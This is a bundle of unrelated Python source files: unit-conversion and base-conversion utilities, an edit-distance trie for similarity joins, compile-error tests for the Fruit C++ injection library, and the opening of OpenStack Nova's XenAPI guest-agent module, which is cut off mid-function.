            dec = dec.quantize(Decimal("0"))
        else:
            # Set our precision to at least 28 or twice our precision, lest
            # Decimal.quantize complains about "result has too many digits".
            getcontext().prec = max(28, int(decplaces * 2))
            dec = dec.quantize(Decimal(".{}".format("0" * decplaces)))
    except (TypeError, ValueError, ArithmeticError):
        # Bug fix: this was a bare "except:", which also swallowed
        # KeyboardInterrupt/SystemExit. Decimal() raises InvalidOperation
        # (an ArithmeticError subclass) for garbage input and TypeError for
        # unsupported types.
        return "bad"
    # Split the decimal into sign, digits and exponent.
    tup = dec.as_tuple()
    delta = len(tup.digits) + tup.exponent
    digits = "".join(str(d) for d in tup.digits)
    # Put the number back together considering the delta.
    if delta <= 0:
        # Pure fraction: pad with leading zeros after "0.".
        zeros = abs(tup.exponent) - len(tup.digits)
        val = "0." + ("0" * zeros) + digits
    else:
        val = digits[:delta] + ("0" * tup.exponent) + '.' + digits[delta:]
    # Strip trailing 0s and/or trailing dot:
    val = val.rstrip("0")
    if val[-1] == ".":
        val = val[:-1]
    if tup.sign:
        return "-" + val
    return val
def rot(message, shift=3):
    """Encode/decode a message with the Caesar cipher (default shift of 3)."""
    rotated = ascii_lowercase[shift:] + ascii_lowercase[:shift]
    translation = maketrans(ascii_lowercase, rotated)
    return message.lower().translate(translation)
class Base(object):
    """Converts integers between base 10 and bases 2-64.

    Bases 2-62 use digits, then uppercase, then lowercase letters; bases
    63-64 use a base64-style alphabet (letters, digits, '+', '/').
    """

    def __init__(self):
        self._decimal = 0
        # Uppercase first: for bases 11-36 case-insensitive input is handled
        # by upper-casing it before lookup.
        self.alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

    def from_decimal(self, n, base=10):
        "Input: base10 integer. Output: base2-64 string."
        try:
            n = int(n)
        except (ValueError, TypeError):
            return "NaN"
        if base < 2 or base > 64:
            return "N/A"
        # Bug fix: a negative n used to fall into basecases[n] with a negative
        # index and silently return a bogus digit. Encode the magnitude and
        # re-attach the sign instead.
        if n < 0:
            return "-" + self.from_decimal(-n, base)
        basecases = "0123456789" + self.alphabet
        if 63 <= base <= 64:
            basecases = self.alphabet + "0123456789+/"
        if n < base:
            # Single digit (also covers n == 0).
            return basecases[n]
        encoded = []
        while n:
            remainder, n = n % base, n // base
            encoded.insert(0, basecases[remainder])
        return "".join(encoded)

    def to_decimal(self, s, base=10):
        "Input: base2-64 string. Output: base10 integer."
        try:
            s = str(s)
        except (ValueError, TypeError):
            return "NaN"
        if base < 2 or base > 64:
            return "N/A"
        # Generalization: accept a leading '-' for negative values, matching
        # what from_decimal now produces. A lone "-" still yields "NaN".
        sign = 1
        if s.startswith("-") and len(s) > 1:
            sign, s = -1, s[1:]
        basecases = "0123456789" + self.alphabet
        if 63 <= base <= 64:
            basecases = self.alphabet + "0123456789+/"
        basecases = basecases[:base]
        slen = len(s)
        n, idx = 0, 0
        # Allow lowercase letters for base11-36 (single alphabet).
        if base <= 36:
            s = s.upper()
        for c in s:
            if c not in basecases:
                return "NaN"
            power = slen - (idx + 1)
            n += basecases.index(c) * (base ** power)
            idx += 1
        return sign * n
class Data(object):
    """Holds an amount of data (stored as bytes) and converts between units."""

    def __init__(self):
        self.decplaces = 4  # Decimal points of accuracy.
        self._bytes = 0

    def _fmt(self, value):
        # Every unit getter funnels through here for consistent formatting.
        return format_num(value, self.decplaces)

    @property
    def bits(self):
        return self._fmt(self._bytes * 8)

    @bits.setter
    def bits(self, value):
        self._bytes = value / 8

    @property
    def bytes(self):
        "8 bits"
        return self._fmt(self._bytes)

    @bytes.setter
    def bytes(self, value):
        self._bytes = value

    @property
    def kilobytes(self):
        "1000 bytes, kB or KB"
        return self._fmt(self._bytes / 1000)

    @kilobytes.setter
    def kilobytes(self, value):
        self._bytes = value * 1000

    @property
    def megabytes(self):
        "1000^2 bytes, MB"
        return self._fmt(self._bytes / (1000 ** 2))

    @megabytes.setter
    def megabytes(self, value):
        self._bytes = value * (1000 ** 2)

    @property
    def gigabytes(self):
        "1000^3 bytes, GB"
        return self._fmt(self._bytes / (1000 ** 3))

    @gigabytes.setter
    def gigabytes(self, value):
        self._bytes = value * (1000 ** 3)

    @property
    def terrabytes(self):
        "1000^4 bytes, TB"
        return self._fmt(self._bytes / (1000 ** 4))

    @terrabytes.setter
    def terrabytes(self, value):
        self._bytes = value * (1000 ** 4)

    @property
    def petabytes(self):
        "1000^5 bytes, PB"
        return self._fmt(self._bytes / (1000 ** 5))

    @petabytes.setter
    def petabytes(self, value):
        self._bytes = value * (1000 ** 5)

    @property
    def kibibytes(self):
        "1024 bytes, KiB or KB"
        return self._fmt(self._bytes / 1024)

    @kibibytes.setter
    def kibibytes(self, value):
        self._bytes = value * 1024

    @property
    def mebibytes(self):
        "1024^2 bytes, MiB"
        return self._fmt(self._bytes / (1024 ** 2))

    @mebibytes.setter
    def mebibytes(self, value):
        self._bytes = value * (1024 ** 2)

    @property
    def gibibytes(self):
        "1024^3 bytes, GiB"
        return self._fmt(self._bytes / (1024 ** 3))

    @gibibytes.setter
    def gibibytes(self, value):
        self._bytes = value * (1024 ** 3)

    @property
    def tebibytes(self):
        "1024^4 bytes, TiB"
        return self._fmt(self._bytes / (1024 ** 4))

    @tebibytes.setter
    def tebibytes(self, value):
        self._bytes = value * (1024 ** 4)

    @property
    def pebibytes(self):
        "1024^5 bytes, PiB"
        return self._fmt(self._bytes / (1024 ** 5))

    @pebibytes.setter
    def pebibytes(self, value):
        self._bytes = value * (1024 ** 5)
class Length(object):
    """Holds a length (stored internally in meters) and converts units."""

    def __init__(self):
        self.decplaces = 4  # Decimal points of accuracy.
        self._meters = 0

    def _fmt(self, value):
        # Shared formatting hook for every unit getter.
        return format_num(value, self.decplaces)

    @property
    def millimeters(self):
        return self._fmt(self._meters * 1000)

    @millimeters.setter
    def millimeters(self, value):
        self._meters = value / 1000

    @property
    def centimeters(self):
        return self._fmt(self._meters * 100)

    @centimeters.setter
    def centimeters(self, value):
        self._meters = value / 100

    @property
    def meters(self):
        return self._fmt(self._meters)

    @meters.setter
    def meters(self, value):
        self._meters = value

    @property
    def kilometers(self):
        return self._fmt(self._meters / 1000)

    @kilometers.setter
    def kilometers(self, value):
        self._meters = value * 1000

    @property
    def inches(self):
        return self._fmt(self._meters * 39.37007874)

    @inches.setter
    def inches(self, value):
        self._meters = value / 39.37007874

    @property
    def feet(self):
        return self._fmt(self._meters * 3.280839895)

    @feet.setter
    def feet(self, value):
        self._meters = value / 3.280839895

    @property
    def yards(self):
        return self._fmt(self._meters * 1.0936132983)

    @yards.setter
    def yards(self, value):
        self._meters = value / 1.0936132983

    @property
    def miles(self):
        return self._fmt(self._meters * 0.00062137119224)

    @miles.setter
    def miles(self, value):
        self._meters = value / 0.00062137119224
class Volume(object):
    """Holds a volume (stored internally in liters) and converts units."""

    def __init__(self):
        # NOTE: maybe pass decplaces as an argument instead of keeping it here.
        self.decplaces = 4  # Decimal points of accuracy.
        self._liters = 0

    def _fmt(self, value):
        # Shared formatting hook for every unit getter.
        return format_num(value, self.decplaces)

    @property
    def milliliters(self):
        return self._fmt(self._liters * 1000)

    @milliliters.setter
    def milliliters(self, value):
        self._liters = value / 1000

    @property
    def centiliters(self):
        return self._fmt(self._liters * 100)

    @centiliters.setter
    def centiliters(self, value):
        self._liters = value / 100

    @property
    def liters(self):
        return self._fmt(self._liters)

    @liters.setter
    def liters(self, value):
        self._liters = value

    @property
    def kiloliters(self):
        return self._fmt(self._liters / 1000)

    @kiloliters.setter
    def kiloliters(self, value):
        self._liters = value * 1000

    @property
    def ounces(self):
        return self._fmt(self._liters * 33.814022701)

    @ounces.setter
    def ounces(self, value):
        self._liters = value / 33.814022701

    @property
    def pints(self):
        return self._fmt(self._liters * 2.1133764189)

    @pints.setter
    def pints(self, value):
        self._liters = value / 2.1133764189

    @property
    def gallons(self):
        return self._fmt(self._liters * 0.26417205236)

    @gallons.setter
    def gallons(self, value):
        self._liters = value / 0.26417205236

    @property
    def barrels(self):
        return self._fmt(self._liters * 0.0083864143603)

    @barrels.setter
    def barrels(self, value):
        self._liters = value / 0.0083864143603
class Weight(object):
    """Holds a weight (stored internally in kilograms) and converts units."""

    def __init__(self):
        # NOTE: maybe pass decplaces as an argument instead of keeping it here.
        self.decplaces = 4  # Decimal points of accuracy.
        self._kilograms = 0

    def _fmt(self, value):
        # Shared formatting hook for every unit getter.
        return format_num(value, self.decplaces)

    @property
    def milligrams(self):
        return self._fmt(self._kilograms * 1000000)

    @milligrams.setter
    def milligrams(self, value):
        self._kilograms = value / 1000000

    @property
    def grams(self):
        return self._fmt(self._kilograms * 1000)

    @grams.setter
    def grams(self, value):
        self._kilograms = value / 1000

    @property
    def kilograms(self):
        return self._fmt(self._kilograms)

    @kilograms.setter
    def kilograms(self, value):
        self._kilograms = value

    @property
    def tons(self):
        return self._fmt(self._kilograms / 1000)

    @tons.setter
    def tons(self, value):
        self._kilograms = value * 1000

    @property
    def drams(self):
        return self._fmt(self._kilograms * 564.3833912)

    @drams.setter
    def drams(self, value):
        self._kilograms = value / 564.3833912

    @property
    def ounces(self):
        return self._fmt(self._kilograms * 35.27396195)

    @ounces.setter
    def ounces(self, value):
        self._kilograms = value / 35.27396195

    @property
    def pounds(self):
        return self._fmt(self._kilograms * 2.2046226218)

    @pounds.setter
    def pounds(self, value):
        self._kilograms = value / 2.2046226218

    @property
    def ustons(self):
        return self._fmt(self._kilograms * 0.0011023113109)

    @ustons.setter
    def ustons(self, value):
        self._kilograms = value / 0.0011023113109
|
|
import itertools as it
from collections import deque
from Levenshtein import distance
from transactionaldict import TransactionalDict as tdict
class Trie:
    """Prefix tree used for edit-distance-based similarity (self-)joins.

    Sequences are added together with a bitmask recording which input
    collection(s) they belong to; terminal nodes are remembered so stored
    sequences and join results can be produced.
    """
    _root = None
    _terminals = None
    _collection_count = None

    def __init__(self):
        self._root = Node(element='')
        self._terminals = set()
        self._collection_count = 1

    def add(self, seq, collection_mask):
        """Inserts seq, OR-ing collection_mask into the terminal node's mask."""
        node = self._root
        for e in seq:
            node = node.add_or_fetch_child(e)
        node._member_of = node._member_of | collection_mask
        self._terminals.add(node)

    def items(self):
        """Yields every stored sequence, reconstructed from terminal nodes."""
        for i in self._terminals:
            yield i.prefix()

    def longest_prefix(self, seq):
        """Returns the node of the longest prefix of seq present in the trie."""
        node = self._root
        # Bug fix: removed a dead `iter = (i for i in seq)` generator that was
        # never consumed and shadowed the builtin iter().
        for i in seq:
            child = node.child_by_element(i)
            if not child:
                break
            node = child
        return node

    @staticmethod
    def calc_active_node_set(node, parent_node_set, sigma):
        """Computes node's active-node set from its parent's set.

        parent_node_set maps nodes to edit distances; sigma is the maximum
        edit distance allowed.
        """
        active_nodes = []
        for n, ed in parent_node_set.items():
            if ed < sigma:
                active_nodes.append((n, ed+1))
            for nc in n._child_nodes:
                if not nc._visited:
                    continue
                if nc._element == node._element:
                    active_nodes.append((nc, ed))
                    if ed < sigma and nc != node:
                        for ncc,d in nc.breadth_first(sigma-ed):
                            active_nodes.append((ncc, ed+d))
                elif ed < sigma:
                    active_nodes.append((nc, ed+1))
        # dict() keeps the last (smallest, after the reverse sort) distance
        # seen for each node.
        return dict(sorted(active_nodes, key=lambda x: x[1], reverse=True))

    def trie_search(self, seq, sigma):
        """Yields terminal nodes whose sequences are within sigma of seq."""
        node = self._root
        stack = [None]
        while node:
            if node in self._terminals and node.is_active(seq, sigma):
                yield node
            if not node.can_prune(seq, sigma):
                for child in node:
                    stack.append(child)
            node = stack.pop()

    def _index(self, collection, collection_id):
        # collection_id is the bitmask identifying the source collection.
        for w in collection:
            self.add(w, collection_id)

    def index(self, collection1, collection2=None):
        """Indexes one or two collections of sequences into the trie."""
        self._index(collection1, 1)
        if collection2:
            self._collection_count = 2
            self._index(collection2, 2)

    def _self_join(self, sigma):
        """Yields pairs of distinct terminal nodes within edit distance sigma."""
        for n in self._root.pre_order():
            n._visited = False
        active_node_stack = [{self._root : 0}]
        self._root._visited = True
        traversal_stack = [None] + [c for c in self._root]
        node = traversal_stack.pop()
        while node:
            node._visited = True
            # Calculate this node's active node set
            parent_active_nodes = active_node_stack[-1]
            active_node_set = self.calc_active_node_set(
                node, parent_active_nodes, sigma)
            # Update active node sets of ancestors
            for ancestor_active_node, cnt in zip(
                    active_node_stack[-1:-sigma-1:-1], it.count(start=1)):
                if (not node in ancestor_active_node or
                        cnt < ancestor_active_node[node]):
                    ancestor_active_node[node] = cnt
            # Possibly generate results
            if node in self._terminals:
                for output_candidate in active_node_set:
                    if (output_candidate in self._terminals and
                            output_candidate != node):
                        yield (node, output_candidate)
            # Push child nodes on traversal stack
            traversal_stack.extend(child for child in node._child_nodes)
            next_node = traversal_stack.pop()
            # active_node_stack book keeping
            if next_node and next_node._parent == node:
                # went down
                active_node_stack.append(active_node_set)
            elif next_node and next_node._parent == node._parent:
                # stay on same level
                pass
            elif next_node:
                # went up
                for a in node.move_up():
                    active_node_stack.pop()
                    if a._parent == next_node._parent:
                        break
            node = next_node

    def join(self, sigma):
        """Joins the indexed collection(s) with maximum edit distance sigma.

        NOTE(review): only the single-collection self-join is implemented;
        with two indexed collections this currently returns None — confirm
        whether a cross-collection join was intended.
        """
        if self._collection_count < 2:
            return self._self_join(sigma)
class Node:
    """A single node of a :class:`Trie`.

    Each node stores one sequence element plus links to its parent and
    children; the word a node represents is the concatenation of elements
    on the path from the root (see :meth:`prefix`). The root is the node
    with no parent. ``_member_of`` is a collection bitmask maintained by
    ``Trie.add``; ``_visited`` is set externally by the join traversal.
    """
    # Class-level defaults; instances overwrite these in __init__.
    _child_nodes = None
    _parent = None
    _element = None
    _member_of = None

    def __init__(self, element=None, parent=None):
        self._element = element
        self._parent = parent
        self._child_nodes = []
        self._member_of = 0

    def prefix(self):
        """Return the sequence spelled on the path from the root to self."""
        stack = []
        node = self
        while node._parent:
            stack.append(node._element)
            node = node._parent
        return ''.join(reversed(stack))

    def add_or_fetch_child(self, element):
        """ Create and/or fetch a child that has element
            If this node has a child with element, then return
            that child. Otherwise create a node with element,
            add the node to this node and then return it.
        """
        child = self.child_by_element(element)
        if not child:
            child = Node(element, self)
            self._child_nodes.append(child)
        return child

    def child_by_element(self, element):
        """ Return a child iff it has element """
        for c in self._child_nodes:
            if c._element == element:
                return c

    def is_active(self, test_seq, sigma):
        """True iff this node's word is within edit distance sigma of
        test_seq (uses the Levenshtein extension module)."""
        node_prefix = self.prefix()
        return distance(node_prefix, test_seq) <= sigma

    def can_prune(self, test_seq, sigma):
        """True iff no prefix of test_seq is within sigma of this node's
        word, i.e. the whole subtree below can be skipped."""
        node_prefix = self.prefix()
        for i in range(len(test_seq) + 1):
            prefix = test_seq[:i]
            if self.is_active(prefix, sigma):
                return False
        return True

    def is_ancestor(self, node):
        """Return True iff self is a proper ancestor of node.

        BUGFIX: the original compared ``self == node._parent`` on every
        iteration instead of the yielded ancestor, so it only ever
        detected the direct parent.
        """
        for a in node.move_up():
            if self == a:
                return True
        return False

    def move_up(self):
        """Yield the chain of ancestors: parent, grandparent, ..., root."""
        node = self
        while node._parent:
            yield node._parent
            node = node._parent

    def pre_order(self):
        """Pre-order traversal of the subtree rooted at this node."""
        node = self
        stack = [None]
        while node:
            yield node
            # reversed() so the leftmost child is popped (visited) first.
            stack.extend(reversed(node._child_nodes))
            node = stack.pop()

    def breadth_first(self, max_rel_depth=None):
        """Yield (descendant, relative_depth) pairs in BFS order, optionally
        limited to max_rel_depth levels below this node."""
        dq = deque((n, 1) for n in self)
        while dq:
            n,d = dq.popleft()
            yield n,d
            d_ = d + 1
            if not max_rel_depth or d_ <= max_rel_depth:
                for n_ in n:
                    dq.append((n_,d_))

    def __str__(self):
        return 'Node(%s)' % (self.prefix() if
                             self._parent else '-ROOT-',)

    def __repr__(self):
        return '<Node(%s)>' % (self.prefix() if
                               self._parent else '-ROOT-',)

    def __iter__(self):
        return (c for c in self._child_nodes)
|
|
#!/usr/bin/env python3
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import parameterized
from fruit_test_common import *
COMMON_DEFINITIONS = '''
#include "test_common.h"
struct X;
struct Annotation1 {};
using XAnnot1 = fruit::Annotated<Annotation1, X>;
struct Annotation2 {};
using XAnnot2 = fruit::Annotated<Annotation2, X>;
'''
class TestInjector(parameterized.TestCase):
    """Compile-time behaviour tests for fruit::Injector.

    Each test builds a C++ snippet and asserts (via the fruit_test_common
    helpers) either that it compiles/runs, or that it fails with a specific
    fruit diagnostic. Parameterized variants cover both plain and annotated
    types.
    """
    def test_empty_injector(self):
        """An Injector<> over an empty component compiles and runs."""
        source = '''
            fruit::Component<> getComponent() {
              return fruit::createComponent();
            }
            int main() {
              fruit::Injector<> injector(getComponent);
            }
            '''
        expect_success(
            COMMON_DEFINITIONS,
            source)
    @parameterized.parameters([
        'X',
        'fruit::Annotated<Annotation1, X>',
    ])
    def test_error_component_with_requirements(self, XAnnot):
        """The 2-arg Injector ctor rejects a component with requirements."""
        source = '''
            struct X {};
            fruit::Component<fruit::Required<XAnnot>> getComponent();
            void f(fruit::NormalizedComponent<XAnnot> normalizedComponent) {
              fruit::Injector<XAnnot> injector(normalizedComponent, getComponent);
            }
            '''
        expect_compile_error(
            'ComponentWithRequirementsInInjectorError<XAnnot>',
            'When using the two-argument constructor of Injector, the component used as second parameter must not have requirements',
            COMMON_DEFINITIONS,
            source,
            locals())
    @parameterized.parameters([
        'X',
        'fruit::Annotated<Annotation1, X>',
    ])
    def test_error_declared_types_not_provided(self, XAnnot):
        """Declaring a provided type that no component supplies is an error."""
        source = '''
            struct X {
              using Inject = X();
            };
            fruit::Component<> getEmptyComponent() {
              return fruit::createComponent();
            }
            int main() {
              fruit::NormalizedComponent<> normalizedComponent(getEmptyComponent);
              fruit::Injector<XAnnot> injector(normalizedComponent, getEmptyComponent);
            }
            '''
        expect_compile_error(
            'TypesInInjectorNotProvidedError<XAnnot>',
            'The types in TypesNotProvided are declared as provided by the injector, but none of the two components passed to the Injector constructor provides them.',
            COMMON_DEFINITIONS,
            source,
            locals())
    @parameterized.parameters([
        ('X', 'const X'),
        ('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, const X>'),
    ])
    def test_error_declared_nonconst_types_provided_as_const(self, XAnnot, ConstXAnnot):
        """A const-only component cannot satisfy a non-const injector type
        (fails ctor overload resolution; messages differ per compiler)."""
        source = '''
            struct X {
              using Inject = X();
            };
            fruit::Component<ConstXAnnot> getComponent();
            int main() {
              fruit::Injector<XAnnot> injector(getComponent);
            }
            '''
        expect_generic_compile_error(
            r'no matching constructor for initialization of .fruit::Injector<XAnnot>.'
            r'|no matching function for call to .fruit::Injector<XAnnot>::Injector\(fruit::Component<ConstXAnnot> \(&\)\(\)\).'
            # MSVC
            r'|.fruit::Injector<XAnnot>::Injector.: none of the 2 overloads could convert all the argument types',
            COMMON_DEFINITIONS,
            source,
            locals())
    @parameterized.parameters([
        ('X', 'const X'),
        ('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, const X>'),
    ])
    def test_error_declared_nonconst_types_provided_as_const_with_normalized_component(self, XAnnot, ConstXAnnot):
        """Same as above, via NormalizedComponent: fruit's own diagnostic."""
        source = '''
            struct X {};
            fruit::Component<> getEmptyComponent();
            void f(fruit::NormalizedComponent<ConstXAnnot> normalizedComponent) {
              fruit::Injector<XAnnot> injector(normalizedComponent, getEmptyComponent);
            }
            '''
        expect_compile_error(
            'TypesInInjectorProvidedAsConstOnlyError<XAnnot>',
            'The types in TypesProvidedAsConstOnly are declared as non-const provided types by the injector',
            COMMON_DEFINITIONS,
            source,
            locals())
    @parameterized.parameters([
        ('X', 'Y'),
        ('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation2, Y>'),
    ])
    def test_injector_get_error_type_not_provided(self, XAnnot, YAnnot):
        """get<T>() on a type the injector does not provide is an error."""
        source = '''
            struct X {
              using Inject = X();
            };
            struct Y {};
            fruit::Component<XAnnot> getComponent() {
              return fruit::createComponent();
            }
            int main() {
              fruit::Injector<XAnnot> injector(getComponent);
              injector.get<YAnnot>();
            }
            '''
        expect_compile_error(
            'TypeNotProvidedError<YAnnot>',
            'Trying to get an instance of T, but it is not provided by this Provider/Injector.',
            COMMON_DEFINITIONS,
            source,
            locals())
    @parameterized.parameters([
        ('const X', 'X&', r'X&'),
        ('const X', 'X*', r'X\*'),
        ('const X', 'std::shared_ptr<X>', r'std::shared_ptr<X>'),
        ('fruit::Annotated<Annotation1, const X>', 'fruit::Annotated<Annotation1, X&>', r'fruit::Annotated<Annotation1, X&>'),
        ('fruit::Annotated<Annotation1, const X>', 'fruit::Annotated<Annotation1, X*>', r'fruit::Annotated<Annotation1, X\*>'),
        ('fruit::Annotated<Annotation1, const X>', 'fruit::Annotated<Annotation1, std::shared_ptr<X>>', r'fruit::Annotated<Annotation1, std::shared_ptr<X>>'),
    ])
    def test_injector_const_provided_type_does_not_allow_injecting_nonconst_variants(self, ConstXAnnot, XInjectorGetParam, XInjectorGetParamRegex):
        """A const-provided type cannot be fetched via mutable forms."""
        source = '''
            void f(fruit::Injector<ConstXAnnot> injector) {
              injector.get<XInjectorGetParam>();
            }
            '''
        expect_compile_error(
            'TypeProvidedAsConstOnlyError<XInjectorGetParamRegex>',
            'Trying to get an instance of T, but it is only provided as a constant by this Provider/Injector',
            COMMON_DEFINITIONS,
            source,
            locals())
    @parameterized.parameters([
        ('X', 'X'),
        ('X', 'const X&'),
        ('X', 'const X*'),
        ('X', 'X&'),
        ('X', 'X*'),
        ('X', 'std::shared_ptr<X>'),
        ('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, X>'),
        ('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, const X&>'),
        ('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, const X*>'),
        ('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, X&>'),
        ('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, X*>'),
        ('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, std::shared_ptr<X>>'),
    ])
    def test_injector_get_ok(self, XBindingInInjector, XInjectorGetParam):
        """All value/ref/pointer get<> variants work on a non-const binding."""
        source = '''
            struct X {
              using Inject = X();
            };
            fruit::Component<XBindingInInjector> getComponent() {
              return fruit::createComponent();
            }
            int main() {
              fruit::Injector<XBindingInInjector> injector(getComponent);
              auto x = injector.get<XInjectorGetParam>();
              (void)x;
            }
            '''
        expect_success(
            COMMON_DEFINITIONS,
            source,
            locals())
    @parameterized.parameters([
        ('const X', 'X'),
        ('const X', 'const X&'),
        ('const X', 'const X*'),
        ('fruit::Annotated<Annotation1, const X>', 'fruit::Annotated<Annotation1, X>'),
        ('fruit::Annotated<Annotation1, const X>', 'fruit::Annotated<Annotation1, const X&>'),
        ('fruit::Annotated<Annotation1, const X>', 'fruit::Annotated<Annotation1, const X*>'),
    ])
    def test_injector_get_const_binding_ok(self, XBindingInInjector, XInjectorGetParam):
        """Const-compatible get<> variants work on a const instance binding."""
        XBindingInInjectorWithoutConst = XBindingInInjector.replace('const ', '')
        source = '''
            struct X {};
            const X x{};
            fruit::Component<XBindingInInjector> getComponent() {
              return fruit::createComponent()
                  .bindInstance<XBindingInInjectorWithoutConst, X>(x);
            }
            int main() {
              fruit::Injector<XBindingInInjector> injector(getComponent);
              auto x = injector.get<XInjectorGetParam>();
              (void)x;
            }
            '''
        expect_success(
            COMMON_DEFINITIONS,
            source,
            locals())
    @parameterized.parameters([
        ('X**', r'X\*\*'),
        ('std::shared_ptr<X>*', r'std::shared_ptr<X>\*'),
        ('const std::shared_ptr<X>', r'const std::shared_ptr<X>'),
        ('X* const', r'X\* const'),
        ('const X* const', r'const X\* const'),
        ('std::nullptr_t', r'(std::)?nullptr(_t)?'),
        ('X*&', r'X\*&'),
        ('X(*)()', r'X(\((__cdecl)?\*\))?\((void)?\)'),
        ('void', r'void'),
        ('fruit::Annotated<Annotation1, X**>', r'X\*\*'),
    ])
    def test_injector_get_error_type_not_injectable(self, XVariant, XVariantRegex):
        """Exotic type forms are rejected as non-injectable."""
        source = '''
            struct X {};
            void f(fruit::Injector<X> injector) {
              injector.get<XVariant>();
            }
            '''
        expect_compile_error(
            'NonInjectableTypeError<XVariantRegex>',
            'The type T is not injectable.',
            COMMON_DEFINITIONS,
            source,
            locals())
    @parameterized.parameters([
        ('X[]', r'X\[\]'),
    ])
    def test_injector_get_error_array_type(self, XVariant, XVariantRegex):
        """Array types fail with a plain compiler error (no fruit wrapper)."""
        source = '''
            struct X {};
            void f(fruit::Injector<X> injector) {
              injector.get<XVariant>();
            }
            '''
        expect_generic_compile_error(
            'function cannot return array type'
            '|function returning an array'
            # MSVC
            '|.fruit::Injector<X>::get.: no matching overloaded function found',
            COMMON_DEFINITIONS,
            source,
            locals())
# NOTE(review): `absltest` is not imported explicitly in this file; it is
# presumably re-exported by `from fruit_test_common import *` — confirm.
if __name__ == '__main__':
    absltest.main()
|
|
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import binascii
from distutils import version
import os
import sys
import time
import uuid
from oslo.config import cfg
from oslo.serialization import jsonutils
from oslo.utils import strutils
from nova.api.metadata import password
from nova.compute import utils as compute_utils
from nova import context
from nova import crypto
from nova import exception
from nova.i18n import _
from nova import objects
from nova.openstack.common import log as logging
from nova import utils
# Glance image-property names that control agent behaviour, together with
# their instance system-metadata counterparts (prefixed with
# utils.SM_IMAGE_PROP_PREFIX).
USE_AGENT_KEY = "xenapi_use_agent"
USE_AGENT_SM_KEY = utils.SM_IMAGE_PROP_PREFIX + USE_AGENT_KEY
SKIP_SSH_KEY = "xenapi_skip_agent_inject_ssh"
SKIP_SSH_SM_KEY = utils.SM_IMAGE_PROP_PREFIX + SKIP_SSH_KEY
SKIP_FILES_AT_BOOT_KEY = "xenapi_skip_agent_inject_files_at_boot"
SKIP_FILES_AT_BOOT_SM_KEY = utils.SM_IMAGE_PROP_PREFIX \
        + SKIP_FILES_AT_BOOT_KEY
LOG = logging.getLogger(__name__)
# Tunables for communicating with the in-guest agent; registered under the
# [xenserver] config group below.
xenapi_agent_opts = [
    cfg.IntOpt('agent_timeout',
               default=30,
               help='Number of seconds to wait for agent reply'),
    cfg.IntOpt('agent_version_timeout',
               default=300,
               help='Number of seconds to wait for agent '
                    'to be fully operational'),
    cfg.IntOpt('agent_resetnetwork_timeout',
               default=60,
               help='Number of seconds to wait for agent reply '
                    'to resetnetwork request'),
    cfg.StrOpt('agent_path',
               default='usr/sbin/xe-update-networking',
               help='Specifies the path in which the XenAPI guest agent '
                    'should be located. If the agent is present, network '
                    'configuration is not injected into the image. '
                    'Used if compute_driver=xenapi.XenAPIDriver and '
                    'flat_injected=True'),
    cfg.BoolOpt('disable_agent',
                default=False,
                help='Disables the use of the XenAPI agent in any image '
                     'regardless of what image properties are present.'),
    cfg.BoolOpt('use_agent_default',
                default=False,
                help='Determines if the XenAPI agent should be used when '
                     'the image used does not contain a hint to declare if '
                     'the agent is present or not. '
                     'The hint is a glance property "' + USE_AGENT_KEY + '" '
                     'that has the value "True" or "False". '
                     'Note that waiting for the agent when it is not present '
                     'will significantly increase server boot times.'),
]
CONF = cfg.CONF
CONF.register_opts(xenapi_agent_opts, 'xenserver')
def _call_agent(session, instance, vm_ref, method, addl_args=None,
                timeout=None, success_codes=None):
    """Abstracts out the interaction with the agent xenapi plugin.

    Calls `method` on the in-guest agent through the 'agent' xapi plugin
    and returns the agent's message string. If the guest rebooted during
    the call, waits for the new domid and retries once transparently.

    :raises exception.AgentTimeout: the agent did not reply in time.
    :raises exception.AgentNotImplemented: the agent lacks `method`.
    :raises exception.AgentError: any other failure or bad response.
    """
    if addl_args is None:
        addl_args = {}
    if timeout is None:
        timeout = CONF.xenserver.agent_timeout
    if success_codes is None:
        success_codes = ['0']
    # always fetch domid because VM may have rebooted
    dom_id = session.VM.get_domid(vm_ref)
    args = {
        'id': str(uuid.uuid4()),
        'dom_id': str(dom_id),
        'timeout': str(timeout),
    }
    args.update(addl_args)
    try:
        ret = session.call_plugin('agent', method, args)
    except session.XenAPI.Failure as e:
        # The plugin reports failures as text in the last detail line.
        err_msg = e.details[-1].splitlines()[-1]
        if 'TIMEOUT:' in err_msg:
            LOG.error(_('TIMEOUT: The call to %(method)s timed out. '
                        'args=%(args)r'),
                      {'method': method, 'args': args}, instance=instance)
            raise exception.AgentTimeout(method=method)
        elif 'REBOOT:' in err_msg:
            LOG.debug('REBOOT: The call to %(method)s detected a reboot. '
                      'args=%(args)r',
                      {'method': method, 'args': args}, instance=instance)
            # Wait for the new domain to appear, then retry against it.
            _wait_for_new_dom_id(session, vm_ref, dom_id, method)
            return _call_agent(session, instance, vm_ref, method,
                               addl_args, timeout, success_codes)
        elif 'NOT IMPLEMENTED:' in err_msg:
